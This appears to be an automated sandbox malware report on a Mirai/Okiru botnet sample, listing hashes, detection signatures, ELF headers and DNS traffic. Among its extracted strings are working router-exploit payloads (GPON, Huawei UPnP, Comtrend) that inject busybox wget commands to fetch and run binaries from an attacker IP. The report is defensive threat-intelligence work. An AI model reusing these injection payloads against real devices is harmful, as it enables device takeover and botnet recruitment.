
Linux Analysis Report
Yboats.m68k.elf

Overview

General Information

Sample name: Yboats.m68k.elf
Analysis ID: 1594274
MD5: 7dee212cd055d7c3849195f3fd355f1b
SHA1: 57861cafc8b7d5d2be061b760454ed8182b034ba
SHA256: 49fd75cc934618bbe1ecd94c4eb2d65089cb79ca2be387aa87de24fe350a98c5
Tags: elf, user-abuse_ch

Detection

Mirai, Okiru
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Sample deletes itself
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1594274
Start date and time: 2025-01-18 18:01:21 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: Yboats.m68k.elf
Detection: MAL
Classification: mal100.troj.evad.linELF@0/0@2/0
  • VT rate limit hit for: http://159.223.45.59/Yboats.arm7;chmod
  • VT rate limit hit for: http://159.223.45.59/Yboats.x86
  • VT rate limit hit for: http://159.223.45.59/adb;
  • VT rate limit hit for: http://159.223.45.59/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
  • VT rate limit hit for: http://159.223.45.59/gpon443
Command: /tmp/Yboats.m68k.elf
PID: 5531
Exit Code: 136
Exit Code Info: SIGFPE (8) Floating-point exception
Killed: False
Standard Output: (none)
Standard Error: qemu: uncaught target signal 8 (Floating point exception) - core dumped
  • system is lnxubuntu20
  • Yboats.m68k.elf (PID: 5531, Parent: 5452, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/Yboats.m68k.elf
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source | Rule | Description | Author
Yboats.m68k.elf | JoeSecurity_Okiru | Yara detected Okiru | Joe Security
Yboats.m68k.elf | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security
Yboats.m68k.elf | JoeSecurity_Mirai_3 | Yara detected Mirai | Joe Security
Yboats.m68k.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
Yboats.m68k.elf | MAL_ELF_LNX_Mirai_Oct10_1 | Detects ELF Mirai variant | Florian Roth
  Strings:
  • 0x1d254:$x2: /bin/busybox chmod 777 * /tmp/
  • 0x1cfbf:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

Source | Rule | Description | Author
5531.1.00007f543c001000.00007f543c021000.r-x.sdmp | JoeSecurity_Okiru | Yara detected Okiru | Joe Security
5531.1.00007f543c001000.00007f543c021000.r-x.sdmp | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security
5531.1.00007f543c001000.00007f543c021000.r-x.sdmp | JoeSecurity_Mirai_3 | Yara detected Mirai | Joe Security
5531.1.00007f543c001000.00007f543c021000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5531.1.00007f543c001000.00007f543c021000.r-x.sdmp | MAL_ELF_LNX_Mirai_Oct10_1 | Detects ELF Mirai variant | Florian Roth
  Strings:
  • 0x1d254:$x2: /bin/busybox chmod 777 * /tmp/
  • 0x1cfbf:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                  No Suricata rule has matched


                  AV Detection

Source: Yboats.m68k.elf; Avira: detected
Source: Yboats.m68k.elf; Virustotal: Detection: 63%
Source: Yboats.m68k.elf; ReversingLabs: Detection: 65%
Source: /tmp/Yboats.m68k.elf (PID: 5531); Socket: 127.0.0.1:39148
Source: global traffic; DNS traffic detected: DNS query: daisy.ubuntu.com
Source: Yboats.m68k.elf; String found in binary or memory: http://159.223.45.59/Yboats.arm7;chmod
Source: Yboats.m68k.elf; String found in binary or memory: http://159.223.45.59/Yboats.mips
Source: Yboats.m68k.elf; String found in binary or memory: http://159.223.45.59/Yboats.mips;
Source: Yboats.m68k.elf; String found in binary or memory: http://159.223.45.59/Yboats.mpsl;chmod
Source: Yboats.m68k.elf; String found in binary or memory: http://159.223.45.59/Yboats.x86
Source: Yboats.m68k.elf; String found in binary or memory: http://159.223.45.59/adb;
Source: Yboats.m68k.elf; String found in binary or memory: http://159.223.45.59/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: Yboats.m68k.elf; String found in binary or memory: http://159.223.45.59/gpon443
Source: Yboats.m68k.elf; String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Yboats.m68k.elf; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Yboats.m68k.elf; String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

                  System Summary

Source: Yboats.m68k.elf, type: SAMPLE; Matched rule: Detects ELF Mirai variant; Author: Florian Roth
Source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORY; Matched rule: Detects ELF Mirai variant; Author: Florian Roth
Source: Initial sample; String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://159.223.45.59/gpon443+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
Source: Initial sample; String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 159.223.45.59 -l /tmp/.ybot -r Yboats.mips; /bin/busybox chmod 777 * /tmp/.ybot; /tmp/.ybot huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample; String containing 'busybox' found: /bin/busybox
Source: Initial sample; String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://159.223.45.59/gpon443+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0POST /HNAP1/ HTTP/1.0
Source: Initial sample; String containing 'busybox' found: var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/SofiasshdbashhttpdtelnetddropbearencodersystemYbot/root/dvr_gui//root/dvr_app//anko-app//opt/,
Source: ELF static info symbol of initial sample; .symtab present: no
Source: Yboats.m68k.elf, type: SAMPLE; Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORY; Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: classification engine; Classification label: mal100.troj.evad.linELF@0/0@2/0

                  Hooking and other Techniques for Hiding and Protection

Source: /tmp/Yboats.m68k.elf (PID: 5531); File: /tmp/Yboats.m68k.elf
Source: /tmp/Yboats.m68k.elf (PID: 5531); Queries kernel information via 'uname'
Source: Yboats.m68k.elf, 5531.1.000055c4c6e4a000.000055c4c6ecf000.rw-.sdmp; Binary or memory string: U!/etc/qemu-binfmt/m68k
Source: Yboats.m68k.elf, 5531.1.00007fff779ff000.00007fff77a20000.rw-.sdmp; Binary or memory string: /usr/bin/qemu-m68k
Source: Yboats.m68k.elf, 5531.1.000055c4c6e4a000.000055c4c6ecf000.rw-.sdmp; Binary or memory string: /etc/qemu-binfmt/m68k
Source: Yboats.m68k.elf, 5531.1.00007fff779ff000.00007fff77a20000.rw-.sdmp; Binary or memory string: qemu: uncaught target signal 8 (Floating point exception) - core dumped
Source: Yboats.m68k.elf, 5531.1.00007fff779ff000.00007fff77a20000.rw-.sdmp; Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/Yboats.m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Yboats.m68k.elf

                  Stealing of Sensitive Information

Source: Yara match; File source: Yboats.m68k.elf, type: SAMPLE
Source: Yara match; File source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Yboats.m68k.elf PID: 5531, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match; File source: Yboats.m68k.elf, type: SAMPLE
Source: Yara match; File source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Yboats.m68k.elf PID: 5531, type: MEMORYSTR
MITRE ATT&CK Matrix (tactic: technique, number of matching signatures):
Defense Evasion: File Deletion (1)
Discovery: Security Software Discovery (11)
Command and Control: Non-Application Layer Protocol (1), Application Layer Protocol (1)
                  No configs have been found
Behavior Graph ID: 1594274; Sample: Yboats.m68k.elf; Start date: 18/01/2025; Architecture: LINUX; Score: 100. Nodes: DNS daisy.ubuntu.com; signatures: Malicious sample detected (through community Yara rule), Antivirus / Scanner detection for submitted sample, Multi AV Scanner detection for submitted file, 2 other signatures; process Yboats.m68k.elf started; signature: Sample deletes itself.
Source | Detection | Scanner | Label
Yboats.m68k.elf | 63% | Virustotal |
Yboats.m68k.elf | 66% | ReversingLabs | Linux.Trojan.Mirai
Yboats.m68k.elf | 100% | Avira | EXP/ELF.Mirai.Hua.c
No Antivirus matches


Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.25 | true | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://159.223.45.59/gpon443 | Yboats.m68k.elf | false | | unknown
http://159.223.45.59/Yboats.arm7;chmod | Yboats.m68k.elf | false | | unknown
http://159.223.45.59/adb; | Yboats.m68k.elf | false | | unknown
http://schemas.xmlsoap.org/soap/encoding/ | Yboats.m68k.elf | false | | high
http://159.223.45.59/Yboats.x86 | Yboats.m68k.elf | false | | unknown
http://159.223.45.59/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114 | Yboats.m68k.elf | false | | unknown
http://159.223.45.59/Yboats.mpsl;chmod | Yboats.m68k.elf | false | | unknown
http://purenetworks.com/HNAP1/ | Yboats.m68k.elf | false | | high
http://159.223.45.59/Yboats.mips | Yboats.m68k.elf | false | | unknown
http://159.223.45.59/Yboats.mips; | Yboats.m68k.elf | false | | unknown
http://schemas.xmlsoap.org/soap/envelope/ | Yboats.m68k.elf | false | | high
                                          No contacted IP infos
                                          No context
Match: daisy.ubuntu.com
Associated Sample Name | Detection | Threat Name | Context (resolved IP)
Yboats.arm.elf | malicious | Unknown | 162.213.35.24
Yboats.mips.elf | malicious | Unknown | 162.213.35.25
loki.arm6.elf | malicious | Unknown | 162.213.35.24
dbg.x86.elf | malicious | Unknown | 162.213.35.25
I586.elf | malicious | Mirai | 162.213.35.24
ARMV4L.elf | malicious | Unknown | 162.213.35.24
ARMV6L.elf | malicious | Unknown | 162.213.35.24
MIPSEL.elf | malicious | Unknown | 162.213.35.25
ARMV5L.elf | malicious | Unknown | 162.213.35.24
sshd.elf | malicious | Unknown | 162.213.35.24
                                          No context
                                          No created / dropped files found
File type: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy (8bit): 6.498627791579188
TrID:
• ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: Yboats.m68k.elf
File size: 131'636 bytes
MD5: 7dee212cd055d7c3849195f3fd355f1b
SHA1: 57861cafc8b7d5d2be061b760454ed8182b034ba
SHA256: 49fd75cc934618bbe1ecd94c4eb2d65089cb79ca2be387aa87de24fe350a98c5
SHA512: f40a2628105c681cf4a401e0ed58a65f18eb8cd505cf5608e462815aef04207ae4fe775281c64fce5dd6b13bd99dcc88e8a8fc002a65b96968c7918e5a347228
SSDEEP: 3072:969vqDQz5/MgP8EnYwyIp4kz4IFGOLutHPvpzgEdJFc:0vqDQz5/MgP8EYZC4A7GOQPvpTdvc
TLSH: 2ED36D97B4019E3DF85ED27A81374A0DF021925866A2072BF367BC9BBC730A45F1EE45
File Content Preview: .ELF.......................D...4.........4. ...(.................................. .......................+....... .dt.Q............................NV..a....da.....N^NuNV..J9.. df>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy....N.X....... dN^NuNV..N^NuN

                                          ELF header

Class: ELF32
Data: 2's complement, big endian
Version: 1 (current)
Machine: MC68000
Version Number: 0x1
Type: EXEC (Executable file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0x80000144
Flags: 0x0
ELF Header Size: 52
Program Header Offset: 52
Program Header Size: 32
Number of Program Headers: 3
Section Header Offset: 131236
Section Header Size: 40
Number of Section Headers: 10
Header String Table Index: 9
Section headers:
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
(null) | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
.init | PROGBITS | 0x80000094 | 0x94 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 2
.text | PROGBITS | 0x800000a8 | 0xa8 | 0x1c606 | 0x0 | 0x6 | AX | 0 | 0 | 4
.fini | PROGBITS | 0x8001c6ae | 0x1c6ae | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 2
.rodata | PROGBITS | 0x8001c6bc | 0x1c6bc | 0x3524 | 0x0 | 0x2 | A | 0 | 0 | 2
.ctors | PROGBITS | 0x80021be4 | 0x1fbe4 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.dtors | PROGBITS | 0x80021bec | 0x1fbec | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.data | PROGBITS | 0x80021bf8 | 0x1fbf8 | 0x46c | 0x0 | 0x3 | WA | 0 | 0 | 4
.bss | NOBITS | 0x80022064 | 0x20064 | 0x2688 | 0x0 | 0x3 | WA | 0 | 0 | 4
.shstrtab | STRTAB | 0x0 | 0x20064 | 0x3e | 0x0 | 0x0 | | 0 | 0 | 1

Program headers:
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
LOAD | 0x0 | 0x80000000 | 0x80000000 | 0x1fbe0 | 0x1fbe0 | 6.5181 | 0x5 | R E | 0x2000 | | .init .text .fini .rodata
LOAD | 0x1fbe4 | 0x80021be4 | 0x80021be4 | 0x480 | 0x2b08 | 3.5756 | 0x6 | RW | 0x2000 | | .ctors .dtors .data .bss
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 | |


Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 18, 2025 18:02:13.478430986 CET | 37016 | 53 | 192.168.2.15 | 8.8.8.8
Jan 18, 2025 18:02:13.478430986 CET | 57167 | 53 | 192.168.2.15 | 8.8.8.8
Jan 18, 2025 18:02:13.485377073 CET | 53 | 37016 | 8.8.8.8 | 192.168.2.15
Jan 18, 2025 18:02:13.485435963 CET | 53 | 57167 | 8.8.8.8 | 192.168.2.15

DNS queries:
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 18, 2025 18:02:13.478430986 CET | 192.168.2.15 | 8.8.8.8 | 0xdb6e | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
Jan 18, 2025 18:02:13.478430986 CET | 192.168.2.15 | 8.8.8.8 | 0xeb09 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false

DNS answers:
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 18, 2025 18:02:13.485377073 CET | 8.8.8.8 | 192.168.2.15 | 0xdb6e | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false
Jan 18, 2025 18:02:13.485377073 CET | 8.8.8.8 | 192.168.2.15 | 0xdb6e | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false

                                          System Behavior

Start time (UTC): 17:02:11
Start date (UTC): 18/01/2025
Path: /tmp/Yboats.m68k.elf
Arguments: /tmp/Yboats.m68k.elf
File size: 4463432 bytes
MD5 hash: cd177594338c77b895ae27c33f8f86cc